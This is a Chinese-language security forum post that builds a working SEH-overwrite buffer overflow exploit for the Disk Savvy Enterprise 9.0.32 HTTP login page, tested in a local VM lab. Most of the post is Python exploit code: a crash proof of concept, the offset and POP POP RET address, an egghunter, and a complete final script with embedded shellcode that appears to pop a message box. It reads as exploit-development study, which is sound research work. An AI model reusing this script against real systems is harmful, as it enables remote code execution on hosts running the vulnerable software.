-
-
[原创]Disk Savvy Enterprise 9.0.32(SEH溢出)
-
2017-3-4 10:31 3320
-
漏洞:https://www.exploit-db.com/exploits/40459/
Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow
环境:VirtualBox Win7企业版 + Disk Savvy Enterprise 9.0.32 + immunity debugger + ida
Disk Savvy Enterprise 9.0.32,运行。界面:
这只是这个软件的客户端,设置一下,打开软件的http服务
immunity 附加进程disksvs.exe进程
import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.114',80)) evil = "POST /login HTTP/1.1\r\n" evil += "Host: 192.168.123.132\r\n" evil += "User-Agent: Mozilla/5.0\r\n" evil += "Connection: close\r\n" evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" evil += "Accept-Language: en-us,en;q=0.5\r\n" evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" evil += "Keep-Alive: 300\r\n" evil += "Proxy-Connection: keep-alive\r\n" evil += "Content-Type: application/x-www-form-urlencoded\r\n" evil += "Content-Length: 17000\r\n\r\n" evil += "username=admin" evil += "&password=aaaaa\r\n" evil += "A" * 20000 s.send(evil) s.close()
程序出现异常,seh链,已经被覆盖为AAAA。
接下来构造seh的payload:
[junk][nSEH][SEF][nop+shellcode]
接下来要搞定触发异常的大小,SEH位置,"POP POP RET"
evil += "&password=aaaaa\r\n" evil += "A" * 12000 evil += "\x90" * 10000
触发异常,算一下seh的地址,相差 2292
用mona.py [!mona seh]插件找一下"POP POP RET"
更改payload为
``` seh = "\xac\x43\x0c\x10" nseh = "\xEB\x0B\x90\x90" evil += "A" * 14292 evil += nseh evil += seh evil += "\x90" * 10000 s.send(evil) s.close() ```
成功执行,但是可以放置shellcode的内存太小,用egghunt的方式去寻找内存中的shellcode,然后去执行。
egghunt的代码
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" egg = "w00tw00t"
最后加上payload
``` import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.114',80)) seh = "\xac\x43\x0c\x10" nseh = "\xEB\x0B\x90\x90" egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0"; evil = "POST /login HTTP/1.1\r\n" evil += "Host: 192.168.123.132\r\n" evil += "User-Agent: Mozilla/5.0\r\n" evil += "Connection: close\r\n" evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" evil += "Accept-Language: en-us,en;q=0.5\r\n" evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" evil += "Keep-Alive: 300\r\n" evil += "Proxy-Connection: keep-alive\r\n" evil += "Content-Type: application/x-www-form-urlencoded\r\n" evil += "Content-Length: 17000\r\n\r\n" evil += "username=admin" evil += "&password=aaaaa\r\n" evil += "A" * 14057 evil += "w00tw00t" evil += shellcode evil += nseh evil += seh evil += egghunter evil += "\x90" * 10000 s.send(evil) s.close() ```
最后,有问题的是libspp.dll模块的getnextstring函数,把接受到的值赋给堆地址a5触发了异常。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工 作,每周日13:00-18:00直播授课
赞赏
他的文章
看原图